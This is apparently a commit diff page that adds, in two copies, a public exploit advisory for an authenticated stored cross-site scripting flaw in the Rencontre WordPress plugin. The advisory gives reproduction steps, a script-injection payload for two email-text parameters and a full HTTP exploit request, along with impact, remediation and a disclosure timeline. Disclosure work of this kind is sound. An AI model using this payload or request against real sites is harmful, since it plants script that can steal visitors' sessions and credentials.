sathishshan · November 5, 2019 09:07 · sathishshan · Nov 5, 2019
diff --git a/#1 Auth_Stored_XSS.txt b/#1 Auth_Stored_XSS.txt
 # Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
 # Date: 04/08/2019
 # Exploit Author: Sathishshan
 # Version: <= 3.1.3
 # Vendor Homepage: Recontre
 # Software Link: https://wordpress.org/plugins/rencontre/
 # Tested on: Ubuntu-server 18.0.* OS
 # Category : Webapps

 # Description

 A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

 # Reproduction Steps:

 0. Auth Stored XSS in two Parameters

 1. Login in WordPress and go to Plugin Email page (http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel)

 2. Under the "Introductory text for the summary email (After hello login - Before the smiles and contact requests)" & "Full text for the birthday mail (After hello pseudo)" there is a text area

 3. Enter/paste the payload & save

 # POC:
 Prameter: textmail & textanniv
 Payload: </textarea></td><script>alert('XSS')</script>//
 Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

 # Exploit Request:

 POST /wp-admin/admin.php?page=rencontre.php&renctab=mel HTTP/1.1
 Host: 192.168.144.128
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 133
 Connection: close
 Cookie: {04425c0c-9ebb-4574-a010-98925da741c5}=value; wordpress_bcee6f23870sd88d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrsdQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4bf797d1f74eedsda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78sdi7qvm2g4d63dgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XEsdSucFBByPmUEdIF%7C84170a324sdg458679871685b28dcb147a2e88ae850eb6c5d8bb2ecc16as36a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
 Upgrade-Insecure-Requests: 1

 mailmois=0&textmail=</textarea></td><script>alert('XSS')</script>//&textanniv=</textarea></td><script>alert('XSS')</script>//&qmail=0


 # Impact:

 An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

 # Remediation:

 Uninstall the plugin until the vulnerability has been fixed by the developer.

 # Disclosure timeline:

 04/08/2019 1: Vulnerability identified.
 04/08/2019 2: Informed developer of the vulnerability.
 14/08/2019 3: No reply from the developer.
	# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
	# Date: 04/08/2019
	# Exploit Author: Sathishshan
	# Version: <= 3.1.3
	# Vendor Homepage: Recontre
	# Software Link: https://wordpress.org/plugins/rencontre/
	# Tested on: Ubuntu-server 18.0.* OS
	# Category : Webapps

	# Description

	A authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site.

	# Reproduction Steps:

	0. Auth Stored XSS in two Parameters

	1. Login in WordPress and go to Plugin Email page (http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel)

	2. Under the "Introductory text for the summary email (After hello login - Before the smiles and contact requests)" & "Full text for the birthday mail (After hello pseudo)" there is a text area

	3. Enter/paste the payload & save

	# POC:
	Prameter: textmail & textanniv
	Payload: </textarea></td><script>alert('XSS')</script>//
	Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F

	# Exploit Request:

	POST /wp-admin/admin.php?page=rencontre.php&renctab=mel HTTP/1.1
	Host: 192.168.144.128
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php&renctab=mel
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 133
	Connection: close
	Cookie: {04425c0c-9ebb-4574-a010-98925da741c5}=value; wordpress_bcee6f23870sd88d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrsdQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4bf797d1f74eedsda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78sdi7qvm2g4d63dgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XEsdSucFBByPmUEdIF%7C84170a324sdg458679871685b28dcb147a2e88ae850eb6c5d8bb2ecc16as36a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
	Upgrade-Insecure-Requests: 1

	mailmois=0&textmail=</textarea></td><script>alert('XSS')</script>//&textanniv=</textarea></td><script>alert('XSS')</script>//&qmail=0


	# Impact:

	An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.

	# Remediation:

	Uninstall the plugin until the vulnerability has been fixed by the developer.

	# Disclosure timeline:

	04/08/2019 1: Vulnerability identified.
	04/08/2019 2: Informed developer of the vulnerability.
	14/08/2019 3: No reply from the developer.